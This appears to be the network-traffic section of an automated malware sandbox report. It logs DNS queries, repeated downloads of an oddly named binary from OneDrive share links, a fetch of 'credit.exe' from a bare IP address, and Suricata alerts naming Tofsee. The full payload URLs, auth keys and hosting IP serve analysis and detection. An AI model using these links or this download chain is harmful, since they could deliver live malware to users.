Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
zya3ig.sn.files.1drv.com |
CNAME
sn-files.fe.1drv.com
CNAME
l-0003.l-msedge.net
|
13.107.42.12 |
twistednerd.dvrlists.com | 185.189.112.27 | |
onedrive.live.com |
CNAME
l-0004.l-msedge.net
|
13.107.42.13 |
- UDP Requests
-
-
192.168.56.102:58318 164.124.101.2:53
-
192.168.56.102:60922 164.124.101.2:53
-
192.168.56.102:62770 164.124.101.2:53
-
192.168.56.102:62824 164.124.101.2:53
-
192.168.56.102:63203 164.124.101.2:53
-
192.168.56.102:65038 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:60925 239.255.255.250:1900
-
GET
302
https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21106&authkey=ABWUN04e3lg3neg
REQUEST
RESPONSE
BODY
GET /download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21106&authkey=ABWUN04e3lg3neg HTTP/1.1
User-Agent: zipo
Host: onedrive.live.com
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://zya3ig.sn.files.1drv.com/y4mhGDkKmL3VDLSUrEWHAJjnel-AVhbdeVNYyQnBqeWWrlxrQZ9NszEAsvT8XGLPe7mkz9QTC2UI2gLMghScHsnFP_Z6_KMpHHOIsKBYLdy8Z_oB67tIlMC6eqSbrKMSaRvkdLdJNSecdujzF4iBhESi-AinVSWep0qzarT4IY-QFmPWqsXK9v3smoVL9-Ky_SUCQSiGojuKkheE7LkfMcRgw/Boplulwvphysvkdwcittsyporhfrcui?download&psid=1
Set-Cookie: E=P:g8knVgRT2Yg=:84htlfRUMhw5gRl9/aetwzfce0cW7BfEIfLGYUdxlns=:F; domain=.live.com; path=/
Set-Cookie: xid=3ed7c3a7-5060-4c98-bc63-3924f92a7705&&RD0004FF9DF470&254; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Fri, 30-Jul-2021 01:07:14 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Fri, 06-Aug-2021 02:47:14 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: RD0004FF9DF470
X-ODWebServer: canadaeast1-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 750F7947ADBD43358683A1B485A871DD Ref B: SLAEDGE1109 Ref C: 2021-07-30T02:47:13Z
Date: Fri, 30 Jul 2021 02:47:14 GMT
Content-Length: 0
GET
200
https://zya3ig.sn.files.1drv.com/y4mhGDkKmL3VDLSUrEWHAJjnel-AVhbdeVNYyQnBqeWWrlxrQZ9NszEAsvT8XGLPe7mkz9QTC2UI2gLMghScHsnFP_Z6_KMpHHOIsKBYLdy8Z_oB67tIlMC6eqSbrKMSaRvkdLdJNSecdujzF4iBhESi-AinVSWep0qzarT4IY-QFmPWqsXK9v3smoVL9-Ky_SUCQSiGojuKkheE7LkfMcRgw/Boplulwvphysvkdwcittsyporhfrcui?download&psid=1
REQUEST
RESPONSE
BODY
GET /y4mhGDkKmL3VDLSUrEWHAJjnel-AVhbdeVNYyQnBqeWWrlxrQZ9NszEAsvT8XGLPe7mkz9QTC2UI2gLMghScHsnFP_Z6_KMpHHOIsKBYLdy8Z_oB67tIlMC6eqSbrKMSaRvkdLdJNSecdujzF4iBhESi-AinVSWep0qzarT4IY-QFmPWqsXK9v3smoVL9-Ky_SUCQSiGojuKkheE7LkfMcRgw/Boplulwvphysvkdwcittsyporhfrcui?download&psid=1 HTTP/1.1
User-Agent: zipo
Host: zya3ig.sn.files.1drv.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 582144
Content-Type: application/octet-stream
Content-Location: https://zya3ig.sn.files.1drv.com/y4mrYC84379gtgLZVLOPAhahB1YOKbMdC9x599X-N6qxvOXTilD4xLEV_5kWaRuAQpxYSXSH8Grnqol47nSoJ3AjM9R-3kyj0040jNbtjbI1PDLEUhsAhKI11tvYsisRwPRCr3HB0CB46QX2p0flk9AgkP8sS7b1HjnwU7gnwZR56e90YSo_qsQweUzUv0Jsw7c
Expires: Thu, 28 Oct 2021 02:47:14 GMT
Last-Modified: Wed, 28 Jul 2021 15:12:15 GMT
Accept-Ranges: bytes
ETag: D6676A9A61E841F3!106.2
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-MSNSERVER: SN4PPF505B2339A
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: Ynkn3OpMiEecaiHKmXT37Q.0
X-SqlDataOrigin: S
CTag: aYzpENjY3NkE5QTYxRTg0MUYzITEwNi4yNTc
X-PreAuthInfo: rv;poba;
Content-Disposition: attachment; filename="Boplulwvphysvkdwcittsyporhfrcui"
X-Content-Type-Options: nosniff
X-StreamOrigin: X
X-AsmVersion: UNKNOWN; 19.716.706.2005
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 3BF77954292841C68E9E505A1D1AFECD Ref B: SLAEDGE1017 Ref C: 2021-07-30T02:47:14Z
Date: Fri, 30 Jul 2021 02:47:14 GMT
GET
302
https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21106&authkey=ABWUN04e3lg3neg
REQUEST
RESPONSE
BODY
GET /download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21106&authkey=ABWUN04e3lg3neg HTTP/1.1
User-Agent: aswe
Host: onedrive.live.com
Cache-Control: no-cache
Cookie: E=P:g8knVgRT2Yg=:84htlfRUMhw5gRl9/aetwzfce0cW7BfEIfLGYUdxlns=:F; xid=3ed7c3a7-5060-4c98-bc63-3924f92a7705&&RD0004FF9DF470&254; xidseq=1; wla42=
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://zya3ig.sn.files.1drv.com/y4mOTz_QAR6NiYt2v34fuSPi5mluFwXvFkGg8tgtdufNHC3Zp9FIYVKG-COsmBXTAwBxjc8xosZ0KnX7YbZwmx2gL8VpE8j5-03OKW0BG2tczyDzTjZtpuri4UXT7gVUL5_4LtiWlB8bzeQv8EGyVBirb0QKQzgVoopEqx_2Y5-ilTcGCMR2XMNsrjj0y-XdrvdZ12IIfBEs2MBrH5lxUUseg/Boplulwvphysvkdwcittsyporhfrcui?download&psid=1
Set-Cookie: E=P:CXnfVgRT2Yg=:OBRYM5vav5/wRCMSthPUp428tekIJMiZ8gu9miRyBgY=:F; domain=.live.com; path=/
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Fri, 30-Jul-2021 01:07:15 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Fri, 06-Aug-2021 02:47:15 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: RD0004FFA71576
X-ODWebServer: canadaeast1-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: D2CE0D418D934E878486D0E5FC10BB71 Ref B: SLAEDGE1109 Ref C: 2021-07-30T02:47:15Z
Date: Fri, 30 Jul 2021 02:47:15 GMT
Content-Length: 0
GET
200
https://zya3ig.sn.files.1drv.com/y4mOTz_QAR6NiYt2v34fuSPi5mluFwXvFkGg8tgtdufNHC3Zp9FIYVKG-COsmBXTAwBxjc8xosZ0KnX7YbZwmx2gL8VpE8j5-03OKW0BG2tczyDzTjZtpuri4UXT7gVUL5_4LtiWlB8bzeQv8EGyVBirb0QKQzgVoopEqx_2Y5-ilTcGCMR2XMNsrjj0y-XdrvdZ12IIfBEs2MBrH5lxUUseg/Boplulwvphysvkdwcittsyporhfrcui?download&psid=1
REQUEST
RESPONSE
BODY
GET /y4mOTz_QAR6NiYt2v34fuSPi5mluFwXvFkGg8tgtdufNHC3Zp9FIYVKG-COsmBXTAwBxjc8xosZ0KnX7YbZwmx2gL8VpE8j5-03OKW0BG2tczyDzTjZtpuri4UXT7gVUL5_4LtiWlB8bzeQv8EGyVBirb0QKQzgVoopEqx_2Y5-ilTcGCMR2XMNsrjj0y-XdrvdZ12IIfBEs2MBrH5lxUUseg/Boplulwvphysvkdwcittsyporhfrcui?download&psid=1 HTTP/1.1
User-Agent: aswe
Host: zya3ig.sn.files.1drv.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 582144
Content-Type: application/octet-stream
Content-Location: https://zya3ig.sn.files.1drv.com/y4mrYC84379gtgLZVLOPAhahB1YOKbMdC9x599X-N6qxvOXTilD4xLEV_5kWaRuAQpxYSXSH8Grnqol47nSoJ3AjM9R-3kyj0040jNbtjbI1PDLEUhsAhKI11tvYsisRwPRCr3HB0CB46QX2p0flk9AgkP8sS7b1HjnwU7gnwZR56e90YSo_qsQweUzUv0Jsw7c
Expires: Thu, 28 Oct 2021 02:47:16 GMT
Last-Modified: Wed, 28 Jul 2021 15:12:15 GMT
Accept-Ranges: bytes
ETag: D6676A9A61E841F3!106.2
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-MSNSERVER: SN3PPF81A67CCDD
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: 92NYqEnG0UOSpenIPWUaNA.0
X-SqlDataOrigin: S
CTag: aYzpENjY3NkE5QTYxRTg0MUYzITEwNi4yNTc
X-PreAuthInfo: rv;poba;
Content-Disposition: attachment; filename="Boplulwvphysvkdwcittsyporhfrcui"
X-Content-Type-Options: nosniff
X-StreamOrigin: X
X-AsmVersion: UNKNOWN; 19.716.706.2005
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: EDC5E9987FB143139B2C6EC7C1E9B15C Ref B: SLAEDGE1112 Ref C: 2021-07-30T02:47:15Z
Date: Fri, 30 Jul 2021 02:47:16 GMT
GET
200
http://192.227.158.111/credit.exe
REQUEST
RESPONSE
BODY
GET /credit.exe HTTP/1.1
Host: 192.227.158.111
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 30 Jul 2021 02:46:44 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/8.0.6
Last-Modified: Wed, 28 Jul 2021 15:17:22 GMT
ETag: "106200-5c8307bb32b79"
Accept-Ranges: bytes
Content-Length: 1073664
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49166 -> 192.227.158.111:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | A Network Trojan was detected |
TCP 192.168.56.102:49169 -> 13.107.42.13:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49171 -> 13.107.42.12:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49170 -> 13.107.42.12:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.227.158.111:80 -> 192.168.56.102:49166 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 192.227.158.111:80 -> 192.168.56.102:49166 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
TCP 192.227.158.111:80 -> 192.168.56.102:49166 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49169 13.107.42.13:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 | CN=onedrive.com | 24:8a:fb:ed:16:0d:11:c8:2f:65:3a:66:ca:f1:6f:60:ad:4c:cc:de |
TLSv1 192.168.56.102:49171 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | 77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49 |
TLSv1 192.168.56.102:49170 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | 77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49 |
Snort Alerts
No Snort Alerts